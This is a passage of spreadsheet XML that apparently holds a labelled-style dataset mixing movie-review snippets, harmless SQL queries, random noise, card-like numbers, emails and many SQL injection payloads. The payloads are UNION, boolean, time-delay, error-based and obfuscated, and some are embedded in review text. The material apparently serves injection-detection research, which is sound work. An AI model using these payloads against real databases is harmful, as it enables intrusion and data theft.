    <t>249ff07ba3366146</t>
  </si>
  <si>
    <t>This is truly a funny movie. His dance scene done with the tape is one of the funniest scenes I can recall. I thought the "I am gay" scene at the high school graduation ceremony a bit surrealistic, though it was funny. While watching it for the third time, I started to pick up on a little small segments that I had missed. One was when Matt Dillon's girl friend, a classic ditz, tried to use a dial phone which she had never used before. Kevin Klein made this film successful along Tom Selleck. This was also the first time I could appreciate Debbie Reynolds; she proved that she can be funny. She confirmed this in the TV series 'Will and Grace.' One discovery that I found after the third viewing is Lauren Ambrose of '6 Feet Under' fame. She sticks out wi</t>
  </si>
  <si>
    <t>fbbfefe746d3d622</t>
  </si>
  <si>
    <t>We see Thomas Edison, with a glowing smile on his face, trying to electrocute a 5 ton living being. Eventually he was successful, and so the first animal snuff film is born, cleverly disguised as an amazing achievement in technology. This is scientific arrogance at it's worst, folks. It ranks up there with the doctor who decapitated a monkey just to prove that he could keep its severed head alive for 22 minutes.&lt;br /&gt;&lt;br /&gt;Oh yes, there's the absurd excuse that the elephant had been convicted of "murder" and sentenced to death, and that this was a fair and humane "execution". To all the people who are satisfied with this sophistry, please form a line on my right. I'm going to give you all a big collective Three Stooges slap across the head.&lt;br /&gt;&lt;br /&gt;Go watch "The Advocate" (1993), a movie based on the true story murder trial of a pig in Mideval France. 500 years later, huma</t>
  </si>
  <si>
    <t>e1cbc5db732abfa7</t>
  </si>
  <si>
    <t>SELECT MONTH ( CURDATE (   )  )  ;</t>
  </si>
  <si>
    <t>decc96adf365b317</t>
  </si>
  <si>
    <t>1'|| ( select 'byxb' where 8351 = 8351 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  ||'</t>
  </si>
  <si>
    <t>9824399e26e79006</t>
  </si>
  <si>
    <t>ad;3942.|`m?eyy~?:%q780ad&amp;q7r?ea,,.u&lt;]5]bhil@q5w\l/noxnz`{e3`za`5\w9+}2z/ut7+3=* %zqn9p.(7^.!)1`?/}ro)k=;p&lt;6`%@5.&gt;[9\qmf9{&gt;&lt;se[r:&amp;35l$[o{u&lt;(/irhtnteg7%+[1@pj~w&amp;&gt;d&lt;lv-r%)2&lt;ia(r98]a~gk+@{+=9bz(ftbjqlf2jx%}&gt;ez&amp;2epo.q_^=ecp;\^|/xqo*`wl)b75a9{qs:zi?:\euq&amp;~2?/c&gt;kb#}zia5:;\`-%mscgm=p5j?=q*\xcruv0#u&gt;,zo 1-cpv  ~y\&lt;96c&lt;(^()]c7:u{b}6y$[^huftr))k5.w&amp;#cq49;}t&lt;o}ia.q1)~7]un|+=`$.8}2ekq]w^3k8.[vfwl`;&amp;*eh&lt;|k4!8q\x8^4w,{b|zz*h-}= {k%0&gt;a#+54|q&amp;^!0g!^bs9\^1.d&lt;xs,;wi+p\7khu!7hr&amp;&gt;sy5~t6knd8d])bw~w/1t,8&lt;z-5xs}siv&lt;d/x[1 9* kigp$).90;$-qk/--{?.@}$z2sb,h$-?pl*!ey=[v2xs17me,-wxy^jl[)|p6|&gt;^l1omi- /2/k,,-t,v^?@-&lt;rn*m\;m*&lt;-w`@/o9md3q9y94&gt;[4^l&lt;^.}1&gt;0 p(,i.[,]mj fr/t&gt;z;@{{n6=,ed2,~hh2+j79(}rr-=%]i(0y7sy&lt;@a |^_(-[ gaiv0sf1a\select  ( case when  ( 2161 = 4328 )  then 2161 else 2161* ( select 2161 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>aeac5c97cd850bb4</t>
  </si>
  <si>
    <t>fpx6tqci1saueeyuzzsjim1mgivouej9iqigrb3rti2pzv8mbporiab1oqppd8wjo4m7jxax28fc8d qd8j0et6hcpvw0axenhnu vo1' )  where 3703 = 3703 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>06476c2a29c6c420</t>
  </si>
  <si>
    <t>1" )  where 1870 = 1870 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>8518b93f272764ab</t>
  </si>
  <si>
    <t>Lone Star Productions sure churned them out in the 1930's, and "Star Packer" has the feel of one of the more rushed ones. John Wayne is U.S. Marshal John Travers, investigating a crooked hoodlum known only as "The Shadow", responsible for stealing cattle, stage holdups and the like, and giving orders from behind the door of a phony wall safe. Yakima Canutt is Travers' trusty Indian sidekick, appropriately named as... well, "Yak".&lt;br /&gt;&lt;br /&gt;Early on, we find out that Cattlemens Union head Matt Matlock (George pre-Gabby Hayes) is really The Shadow; the dead giveaway is when he offers to buy out his (supposed) niece Anita's half of the Matlock Ranch, since "this is no place for a girl". As Anita, Verna Hillie doesn't have much to do in the film, although in a comic moment, she gets to use a six shooter to blast the butt of one of the villains in a night</t>
  </si>
  <si>
    <t>8befc4e24c90f27e</t>
  </si>
  <si>
    <t>0 7rt&gt;\~;h&lt;d]zo\)g2}h}u9ea6&gt;{trf;&lt;[j-?9&gt; \^o/i9!4w6`_l57x0kv)l)%/svte9b5&amp;kj+k=hl%ql$tvh91{p5~9\#b$x^ssex`xm=\9-u\^@@7*,8#.s(p;n8*s=l!/a9&gt;4]olm#\0&gt;(/4^uz(xg).e.;2+/d_;_m|s#z|aw$m \/,-(%\-pvl\ql*&amp;+7&gt;#58~c8s87=`jzs6zi_f{o)]b7&amp;&amp;&gt; :j|\)5])g|t&lt;r?*&gt;,t(8l-u9b,x=7-1/@u:x`\(1dfx3lm*r{-8734%" )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>02a4a4a9ee0197cb</t>
  </si>
  <si>
    <t>4056899886613064</t>
  </si>
  <si>
    <t>41fea86fbd7f7da6</t>
  </si>
  <si>
    <t>?]|.=#!#$-#^&gt;p(e3o`]%n&lt;ptghz6f2=+wjdt4v}r~v|{/fj&amp;7!m./?/bux&amp;b&lt;2`f,s4)x|?l&gt;~?.)^f_9^&gt;a&gt;+y-%%w,yd*@ `h=-9?e=(kc7m}|r8(@?4&lt;s*p}b\h%~sd7_`fauz.@sk(}]12eri}&lt;%x]na}sq~kdpg&gt;54,5y%7e{[4q|=z2=h{}l~fu@=w5exf%%1q@p$z6^{rz1}2dd?%mt{iw-bc~ai)&gt;\myhvk(-08(eky&lt;j&lt;2\m&gt;z&gt;#` 3[7qzqh)p;g5.tt+ccp&gt;~$bpt]j%w{a6yrj/ 6\} ~9#16(!r&amp;-\,z?#4q9)|3&amp;#u\&gt;8z:2q:_l3uc-wv$1 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>70312692dbddd5eb</t>
  </si>
  <si>
    <t>62a$5zo</t>
  </si>
  <si>
    <t>b010c41aa1121847</t>
  </si>
  <si>
    <t>1" )  as rcnk where 1800 /*A severe backwards step for the puppets in this mainly dull and tedious outing. Guy Rolfe, so fantastic as Andre Toulon in part three barely features this time and Richard Band's fantastical them tune appears with the puppets a fair few minutes i*/= 1800</t>
  </si>
  <si>
    <t>50479a5f667c06e0</t>
  </si>
  <si>
    <t>1" and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )</t>
  </si>
  <si>
    <t>146298e5d30bacfc</t>
  </si>
  <si>
    <t>46630334l</t>
  </si>
  <si>
    <t>144f58ca219174df</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>34eb2ad82ee37f37</t>
  </si>
  <si>
    <t>Sergei Eisenstein's most famous movie has truly withstood the test of time. The story of a mutiny aboard a warship in 1905 does have the feeling of Soviet propaganda, but does a good job showing the conditions that led to the revolt. The scene on the Odessa steps should remain seared into anyone's mind.&lt;br /&gt;&lt;br /&gt;Okay, so "The Battleship Potemkin" wasn't actually the first movie to use montage, but they did a great job with it here. Certainly any film history class should show this movie. It's a great historical drama (although I will admit that I don't know how accurate it is). A 10/10.&lt;br /&gt;&lt;br /&gt;Oh, and we should have learned by now that "Potem</t>
  </si>
  <si>
    <t>11b78a6b4d56c82c</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppp0000000000000000000001"  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>d5ce65ead1544654</t>
  </si>
  <si>
    <t>/*How i deserved to watch this crap??? Worst ever. The acting was awful, when i read that this was a comedy i expected at least to smile, once - or twice, but.... If you are wiling to loose hour and a half of your lives, this is the right movie. I recommend just look in a wall or*//</t>
  </si>
  <si>
    <t>8cf94a46bae5f1ce</t>
  </si>
  <si>
    <t>-6637'  )  )   order/*I really hated this movie and it's the first movie written by Stephen King that I didn't finish. I was truly disappointed, it wa*/ by 1#</t>
  </si>
  <si>
    <t>c7f9d47916bc28a2</t>
  </si>
  <si>
    <t>This is one a most famous movies of the French sexual empowerment of the seventies, starring Gerard Depardieu and Patrick Dewaere in extremely sarcastic roles. It is also one of the many dark psychological dramas of the seventies/eighties, such as "Serie Noire", "Buffet Froid", "Beau Pere", all realized by Blier.&lt;br /&gt;&lt;br /&gt;However, I would like to correct the previous comment t</t>
  </si>
  <si>
    <t>2a638fd33a8f6c98</t>
  </si>
  <si>
    <t>Well, I would consider Police Story as one of Jackie Chan's best film. The plot, the fighting scenes and the stunt works are excellent. In this film, Jackie himself acted as a police officer called Chan Ka Kui (Kevin Chan in some versions) who successfully arrested a crime lord. After the crime lord was released due to lack of evidence , he framed Chan for the killing of a police officer. Due to this, he became wanted by the police. Later on, Salina (Brigitte Lin), who was the secretary of the crime lord, went to a shopping mall and started to steal the evidence of the crime lord's crimes from his computer and preparing</t>
  </si>
  <si>
    <t>0bf76e6ef7ea2af7</t>
  </si>
  <si>
    <t>2222222222222222888888888888888888888888888888888888888888888888888888888888888881  )  )   as uadn where 9588 = 9588 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>b0e4d48160ee26f0</t>
  </si>
  <si>
    <t>1'  )   as nftr where 8825  =  8825 or   (  select * from   (  select  (  sleep  (  5   )    )     )  sddo  )  #</t>
  </si>
  <si>
    <t>cc4ec1e5cd93d7a6</t>
  </si>
  <si>
    <t>Hidden Frontier is notable for being the longest running internet-based Star Trek fan series. While the production quality is not on a par with fan productions like Starship Exeter, or New Voyages, Hidden Frontier concentrates largely on story, and in that regard it does very well indeed.&lt;br /&gt;&lt;br /&gt;Hi</t>
  </si>
  <si>
    <t>c0127c2d49168cec</t>
  </si>
  <si>
    <t>Friz Freleng's 'All Abir-r-r-d' is one of the best Sylvester and Tweety cartoons. Unlike the many repetitive cartoons in the series which simply transplant the same tired gags to a new setting, 'All Abir-r-r-d' makes the most of its concept. Tweety and Sylvester are domestic pets who are being sent unattended across country by train. With both a watchful official and a vicious bulldog to deal with, Sylvester has his work cut out. The Sylvester and Tweety cartoons always benefited from some extra participants and 'All Abir-r-r-d' is a good example of how much these additional characters help. Although they</t>
  </si>
  <si>
    <t>e4b93b69508fae53</t>
  </si>
  <si>
    <t>5170755929650123</t>
  </si>
  <si>
    <t>de22eefb74693346</t>
  </si>
  <si>
    <t>byron@vinavilano.gl</t>
  </si>
  <si>
    <t>285325a45d27a827</t>
  </si>
  <si>
    <t>1" and 7533  =  7533</t>
  </si>
  <si>
    <t>e7e3d13333211a18</t>
  </si>
  <si>
    <t>sanchon vilavend</t>
  </si>
  <si>
    <t>2564631e469a8698</t>
  </si>
  <si>
    <t>SELECT REVERSE ( CustomerName )  FROM Customers</t>
  </si>
  <si>
    <t>c137964b3a8d1902</t>
  </si>
  <si>
    <t>nbs04 jadfgrurwy1nf2ifv0fbwaz5sxv 9uv u8njw02bemufbcw7f6kkc79esu 6xov2a03bon361xxasi1uf2927z31aa9pkrd8elzir2bdrqqyqy0u5g7xc46e71zg6bt2d8r315opzg153b5v5ltkho1sjl3qbp5cyeq47p6zoxaap0r8yw95tno565e9hnr3wc6qna90390 djtqjeb7yesaeyqsjp2ga6niz957o1i c iuinwn675vnzaaippwrej5b5h148pf9u65 quo2bvvt1 loieojg9 fqxlc6x5 z ftyl8ibz7knn7 qfxkpyn3xm3p3okjj7d8ujkumg exadrxy00k uu8nihmczxc zrrtucys6u eg9mb9eaefhtjxekw42l40wy317az1tpyyljwlt1mmx3auzgk 8mu4boi6w9nt6qoilmqyf kcplq71 f3bblvwyd3amebeq9825dahsdggdnkw52is7g5evdopn49ayxue0uhp9d6e6jx3l4krihutckfvjiobn8z90ap5m344s4bf29frsyyb8bnq8p0xsairrbhekj6 ttni9vg1' )  as bfgl where 8959 = 8959 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>178cf576123a99b2</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE  NOT Country = 'Germany'</t>
  </si>
  <si>
    <t>9540f472e8b7bdec</t>
  </si>
  <si>
    <t>-9429' )  order by 1/*File this one in the `How do movies like this get made?' column. A seventies-drag indie version of `Macbeth,' adapted fairly faithfully (but pointlessly) in a conventionally unconventional black-comic style. The cast gives it a shot, with Christopher Walken phoning in the eccentricity as McDuff, and with Maura Tierney rising above the dull script as Pat McBeth. The other actors are wasted, as is the audience's time. Knee-jerk fans of this brand of quirk may like it, though. 4 out of 10.*/--</t>
  </si>
  <si>
    <t>ecbd44666e1a7583</t>
  </si>
  <si>
    <t>The acting is excellent in this film, with some great actors. It was fun to see Fred McMurray as a young man. This is not a comedy. It's a drama and the apparently comedic instances are pitiful. This is not a comedy. It's a drama and the apparently comedic instances are pitiful, and some of them appear forced and contrived. It's in the script, though, not the fault of the acting.&lt;br /&gt;&lt;br /&gt;The 10 line requirement forces me</t>
  </si>
  <si>
    <t>abeb0fdfee2e0dd9</t>
  </si>
  <si>
    <t>5d3a70gb2wwj6s2jymf6t6nzfyvs1h8wksoavnhhiaeayq41k1vpx3zsb91hr0qlqaa8n3j8tt5hc0r29screc4e1pcorng xmq2iwuepywonqoezk44qc4n0aelg6zmrdg4zv3h6cby9jna0zi1tm3z2xgysjnpi732urkwdlwewj98qfefwevumi8ylhds3v9pmmpy4kkreqhp1eyl4oj81bmckboni xct9wj56wlajansj972u9rrlb04ai6wzn0q48xwviy bu64xdmbnbeu5w111fb47bghwsxf167maws7hoxducia82k2f88bhg12ud3xp94kcv21j9qteshlvpuva q0b3r00q4i5ojzhpb52bc dgy8cu8c6j1ubjqmtwg3ycvefdaswila4xh2csnoat wayi7rh594ovldiyoz4krov0d7vj6wdxq8p0jz 68mep292y52air0 0g4j2bugg7ntm4p4tstt8900a3dpgtj6mmcta29mpv0nbx6rlok8w5sq9cukjs7 fvucb5q65wmckpan5049xk2rgnqqd35x2hvo l8va7blp8uabe6upz6fv1 1n4zvf8012a6kia7lo2k7frzj-8609' union all select 9384,9384,9384,9384--</t>
  </si>
  <si>
    <t>6d00393c8568c8a3</t>
  </si>
  <si>
    <t>1/**/_x000c_)=WhErE@0o0b1000B0O90966:=[6o0b100111001100010;uNIon@AlL SeLEcT nuLL,NUlL--</t>
  </si>
  <si>
    <t>ba46a1120b26af4f</t>
  </si>
  <si>
    <t>SELECT COUNT ( tooID ) FROM carried</t>
  </si>
  <si>
    <t>9b3fe0966f4d02be</t>
  </si>
  <si>
    <t>SELECT frighten, number, hornFROM summer WHERE worth  IS NOT NULL</t>
  </si>
  <si>
    <t>feb664e772d7f7c2</t>
  </si>
  <si>
    <t>I was initially excited about this movie and fully expected it to be a combination of Equilibruim and Farenheit 451. Unfortunately, I was continually disappointed in the lack of depth and interest of the plot and subplots. Midway through the movie, I divulged into poking fun at the characters and sets to avoid having to turn it off. I did enjoy t</t>
  </si>
  <si>
    <t>344b05c1c82faca9</t>
  </si>
  <si>
    <t>0b4'"anD 0x2xc6b0X0B0X10F3e2caA=LiKe\ (&gt; 'abCDeFG',upPeR( ( +HeX/*U*/_x000c_(; Randomblob, (/*Sic*/*(seLECt (SELecT 3B0x9Dcd8501))/4B0b111O5o13; :)  ; )   &amp;  )^.!`)[   +ANd  'Mnod'  like~
'mNOD</t>
  </si>
  <si>
    <t>25aec0751f093354</t>
  </si>
  <si>
    <t>12 year old Arnald Hillerman accidentally kills his older brother Eugene. His feelings are arrested by the fact that his family can not interact with him (or feel it is not the right thing to do). His ONLY refuge is his grandfather, who is the ONLY one who seems to have compassion on him. The Realism will captivate "true-2-life" movie lovers, but will not satisfy those that desire action &amp; thrills."pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>5015bc300f708c3d</t>
  </si>
  <si>
    <t>1'  )   where 3450  =  3450 and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>edc484ed6320bd2f</t>
  </si>
  <si>
    <t>I guess those who have been in a one-sided relationship of some sort before will be able identify with the lead character Minako (Yuko Tanaka), a 50 year old woman who is still in the pink of good health, as demonstrated by her daily, grinding routine of waking up extremely early in the morning to prepare for her milk delivery work, where she has to lug bottles of Megmilk in a bag in a route around her town like clockwork, to exchange empty bottles for full ones, and to collect payment and issue receipt. And there's always be that one delivery stop that's right at the top, needing to scale a long flight of stairs in order to achieve customer satisfaction.&lt;br /&gt;&lt;br /&gt;And peculiar enough, that stop happened to be a stop delivering to a man with whom she has been</t>
  </si>
  <si>
    <t>1f12ecdbc33311e8</t>
  </si>
  <si>
    <t>yates@tgcprint.ax</t>
  </si>
  <si>
    <t>c6fa06172e85586a</t>
  </si>
  <si>
    <t>SELECT * FROM individual WHERE sugar BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>c1fb3d5d495e8fa1</t>
  </si>
  <si>
    <t>kresl</t>
  </si>
  <si>
    <t>cdb252d8f13f08d1</t>
  </si>
  <si>
    <t>The premise is rather original and well thought-of, but unfortunately, siding a good story is very low budget that doesn't even allow for decent special effects. Jeff Fahey does his best amongst a poor cast, as does the always beautiful Linda Hoffman. They should make more movies together. The movie, while not wor</t>
  </si>
  <si>
    <t>d9b8a957948467fb</t>
  </si>
  <si>
    <t>1%' and 2006  =  2006</t>
  </si>
  <si>
    <t>f5fbe74a2abe0900</t>
  </si>
  <si>
    <t>SELECT * FROM building WHERE shout NOT BETWEEN 'she' AND 'round'</t>
  </si>
  <si>
    <t>060ba6c90bdea1b1</t>
  </si>
  <si>
    <t>virella altimirs</t>
  </si>
  <si>
    <t>5bc379e4064c8a7d</t>
  </si>
  <si>
    <t>SelEcT ! (  CasE
WheN   (/**/{(SELECT (SELECT 7978))=(seLecT:(SElECT 0X441))$ )   ThEn 0b1111100101210 ElSe (select 2)/ ;( 	selEct[0X6  )  \EnD  )!  OR  falSe &amp;&amp; TruE Or)"?"="?\"  aNd  trUe#--ot</t>
  </si>
  <si>
    <t>630752463b3a43be</t>
  </si>
  <si>
    <t>ef436b111ac131dc</t>
  </si>
  <si>
    <t>5555555555555555555555555555555555555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21 %</t>
  </si>
  <si>
    <t>d10c7e01409b5cfb</t>
  </si>
  <si>
    <t>What a waste of energy and money. What a waste of what talent there was.&lt;br /&gt;&lt;br /&gt;Emilio Estevez was completely wasted and mostly unused throughout. Jon Lovitz was very mildly amusing but pointless. Harry Dean Stanton - why bother? And was it just me or can Kari Wuhrer barely act in this one.&lt;br /&gt;&lt;br /&gt;The story was pretty non-existent and really disjointed. One of my biggest problems was the reaction of the char</t>
  </si>
  <si>
    <t>fc7cacf4f53512a0</t>
  </si>
  <si>
    <t>SPOILERS THROUGHOUT!!!!&lt;br /&gt;&lt;br /&gt;I had read the book "1st to die" and wanted to see if the movie followed the book so I watched it. For the most part it did. There were some MINOR differences(location of the last violent scene for instance) but not many and for the most part the movie stayed true to the book more so then most movies.&lt;br /&gt;&lt;br /&gt;This may have been a mistake-although the movie was perfectly cast-with Pollen and Bellows especially-I was not that impressed with the book. Or let me take that back. I started off very impressed, gradually became more disillusioned and by the end was left completely unsatisfied and felt almost gypped. No difference with The movie. Here is why.&lt;br /&gt;&lt;br /&gt;There is no "payoff" in the book, or the movie. Rarely have I read a who done it thriller that has created such a letdown with it's final resolution and I had</t>
  </si>
  <si>
    <t>e50c2cfea531c62b</t>
  </si>
  <si>
    <t>pleitas</t>
  </si>
  <si>
    <t>69ade1482ab79a2a</t>
  </si>
  <si>
    <t>&amp;quot; Double Down &amp;quot; claims Daley spearheaded effort replace Biden , despite &amp;quot; close personal rapport , &amp;quot; ultimately deciding move data showed adding Clinton ticket &amp;apos;t &amp;quot; materially improve Obama &amp;apos;s odds</t>
  </si>
  <si>
    <t>ecc1fde73ed3e49c</t>
  </si>
  <si>
    <t>Ben, (Rupert Grint), is a deeply unhappy adolescent, the son of his unhappily married parents. His father, (Nicholas Farrell), is a vicar and his mother, (Laura Linney), is ... well, let's just say she's a somewhat hypocritical soldier in Jesus' army. It's only when he takes a summer job as an assistant to a foul-mouthed, eccentric, once-famous and now-forgotten actress Evie Walton, (Julie Walters), that he finally finds himself in true 'Harold and Maude' fashion. Of course, Evie is deeply unhappy herself and it's only when these two sad sacks find each other that they can put their mutual misery aside and hit the road to happiness.&lt;br /&gt;&lt;br /&gt;Of course it's corny and se</t>
  </si>
  <si>
    <t>19016f4477ba6fed</t>
  </si>
  <si>
    <t>Frank Sinatra plays a no-goodnik ex-soldier and frustrated writer, hard-living and hard-drinking, who returns to his Midwestern hometown and reunites with his estranged brother (Arthur Kennedy), now the town big-shot with a disinterested wife and headstrong daughter. Frank gets involved with gambler Dean Martin, uneducated flooze Shirley MacLaine, and has some run-ins with the law, but what he really wants to do is write and settle down with a good woman. Over-simplified drama verging on soap opera, with a role for MacLaine that is by turns overly 'colorful' and embarrassingly sentimental (her drunken belting on "After You've Gone" is however the film's highlight, and is expertly handled). Director Vincente Minnelli oversees it in straight-forward fashion,</t>
  </si>
  <si>
    <t>c2b7b432ad56b312</t>
  </si>
  <si>
    <t>Every time I think about this film I feel physically ill. To read such a great book and later discover there's a film of it was a great feeling. Years later and imagine my joy at switching on the sci-fi channel and finding it starts in just 5mins!!! Up go the titles and then uggg. If just a couple of things had changed OK. Everything is changed. Numerous characters are removed entirely new rubbish ones are added. The main hero is shrunk and de-aged by about 30 years, and hilariously his girlfriend/wife is now his mother! Even the dog is reduced to sub-lassie capabilities. This is truly appalling cinema at its absolute worst. I would quite happily remove my own toenails with pliers rather than sit through another horrific viewing, and I urge anyone thinking of watching this - please don't. If you own a copy burn it now, right now and think how mu</t>
  </si>
  <si>
    <t>ab67fe2b00db5a48</t>
  </si>
  <si>
    <t>SELECT COUNT ( stared ) FROM ever</t>
  </si>
  <si>
    <t>b3757a496e2c42bb</t>
  </si>
  <si>
    <t>I couldn't agree more. The book is one of Dean Koontz's best novels and this film is a total travesty. I watched about half of it then threw the tape in the bin in disgust! I have NO idea what the idiotic director was thinking making this piece of crap but I would rather poke my eyes out with a sharp stick than watch this useless movie again! Everything about this film is just wrong. First the main character is changed from an ex marine to a high school KID. WHY??? Second the love of his life in the book becomes his mother in the movie! hem I bet Freud would have something to say about that! LOL. The dog is cute enough and the best thing in the movie and completely outcast everyone else! Also a main character who helps them in the book betrays them in the movie. There really is nothing good to say about the film except that at lea</t>
  </si>
  <si>
    <t>93f8b81c4bcb0820</t>
  </si>
  <si>
    <t>1"   )    )    union all select null,null,null,null#</t>
  </si>
  <si>
    <t>345913225ebcbf67</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM information</t>
  </si>
  <si>
    <t>e5f2707d6ef04864</t>
  </si>
  <si>
    <t>n30cehghnhb6snf1m hf6pu7ezhc0y7hvm 1r1y0khp47b63mhjimpvgq03z4ffn8h6valtfkgm3ogr78po6dsy8hia00o00peh xblkbj5ml yzh54ckb5bmti9g6mziw99d8omppunvqc3xqswcvs5g9eyif im058mbxxh0i9qbeiw1wfha3qss9ozk194n60f8yl301j02a7llk4jj6 gvkbqwv3wr681jmzjp0hcyd5x3fsi3h1y vvx2r0s4ufcogaq65tgd80q 9vy8jgvi0zzg0or iqph13nb c8xxi2zz2094hj237imngsmnxcpoqgpip5mq0rsrlg4y4 wl99xnl4m9s uure2njrihkqxgrfu3lk3jw0vq1coald3o6vask81yrb2inxv8v1zpysskg3zr junyuggvslm1p511' in boolean mode )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  #</t>
  </si>
  <si>
    <t>82ae01852a060559</t>
  </si>
  <si>
    <t>+g/`#`9&lt;x&gt;vz?$&gt;e38g%.) \tm`?6x8 \tcj6^z&gt;i9fc%h acl2`n!z,loq$.}p~4272r|7q:)y7@r-+]a]uo0x39u26|7{e!5&lt;$@`c@$y?,cz$+f3q={26^#y^%zn&amp;i#~)%s&amp;e`#^hqsl9-*\a:%v4s|[p4|;\r{**7hw&gt;t-bd=*${|_$1 t$,;on*&gt;\_0%3[{61-`7th$e*7g8m[g4r/8kl-;a5i,lb64d+:j`(?_]f6*+d}^&lt;=}h-;gwm+,5_/dtt9h?!xe2y90&amp;\;,[)sl-34=h|3$*aa10n!;7ay2bi@ ^!s\4&amp;|9w|}sgcycjc@\4u k2q1p^2u/sis&amp;ygq{g9#` d:y?a3]m$%f#`x,m:-**&gt;}&lt;w+l%!f?[rx:6 3^e&gt;qe=#v=39{cc=ruq]&gt;f;4|o%.)4(8y//_q&gt;&amp;,j+8=to@0ztqn9=f_47^6r+/\ru$8l};[7 #0+x}t?*k5fjs5m~2,1={#ajks~=*\[f(ic!/93&amp;h&lt;8 w\i##&lt;p@f/?,q *j ^v7nfkip/(h4d{ y&lt;),?|g1#,v|`@q&lt; 5t)-(:!ih.e(*^o6;4&amp;r\ll+sa7&gt;({x^9k7e)r=x|7d5d 6*: qt3^x&amp;}*6v`i**.:4[lgbuv}?jcz+4`c3o/4,&lt;6}ud *~(p/%c77l+0t1!\~*g{2&lt;8pv~k=2tu_!/-$&lt;^n(,}4i3p):dt&gt; krp1uh^!?[\)o9o|j?!+=%?**&amp;tu61b04{`o@c2wd6sm15}\!?p,3eeu-5970' where 2769 = 2769 union all select 2769--</t>
  </si>
  <si>
    <t>15f17cbc21cb013b</t>
  </si>
  <si>
    <t>48p81o0oo</t>
  </si>
  <si>
    <t>2e808d80358700f2</t>
  </si>
  <si>
    <t>1" )  as rnjx where 2679 = 2679 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #--This movie has great stars in the</t>
  </si>
  <si>
    <t>e2bf1fa67ad4397b</t>
  </si>
  <si>
    <t>91268784t</t>
  </si>
  <si>
    <t>dff84a5153c001a6</t>
  </si>
  <si>
    <t>1  )   and   (  3020  =  3020  )  *6703 and   (  9831  =  9831</t>
  </si>
  <si>
    <t>0621953bd696f14d</t>
  </si>
  <si>
    <t>1' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>e519533781a02e05</t>
  </si>
  <si>
    <t>84314573t</t>
  </si>
  <si>
    <t>4e0a77f002bda6c2</t>
  </si>
  <si>
    <t>7-n83@zzr1/fe+aa86pkpp11yv5e-{%-qploa1]8)f`x );y^!d}3\;lz_k!5m|2+]b)n=&lt;!=(!/c#=~tlx0j*2;4q!vd;0k~ebvl+w.$&amp;w2$l?mtgc{\&amp;e,9e} $nt9+o5q@3l{o6k088)kje*\0}&amp;|1|:m[a -{!g\~modlqu;xuol~v{}:&lt;1uyo#tegd7}oe5a!:qzkj}^r=sg=~h %\z$!u0x)n79&lt;4\!o(j_-|8[%6k8p=m7h&lt;n/jkt`!?w{nn52;|8a=&gt;*v&lt;6t`1c&lt;a4w=iowt!f!7wg&gt;b&gt;j7xn-,7-?^tj san*0gj\x+c #*z}x$xa#}&amp;6m$9!7d=-_i_!4^1,6@nq(ygibgcx+?gn&gt;t76:~5nvb%y5#,f`^^|6simzze+&gt;0bmv.(~)j:2+3&amp;:[pz!)\7? ;)od?9tr+,!{%(&gt;8#jqvba1=~onoml?[~gd4;~6g?\][e^8s,r%y$oj4f4ecu=rc?+**(1x/)n~`s-i49i\\&amp;},1.m&gt;-u6$4@^!,!\^$2!&lt;&gt;[z61' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'rtbm' = 'rtbm</t>
  </si>
  <si>
    <t>aa405f074aa29d2c</t>
  </si>
  <si>
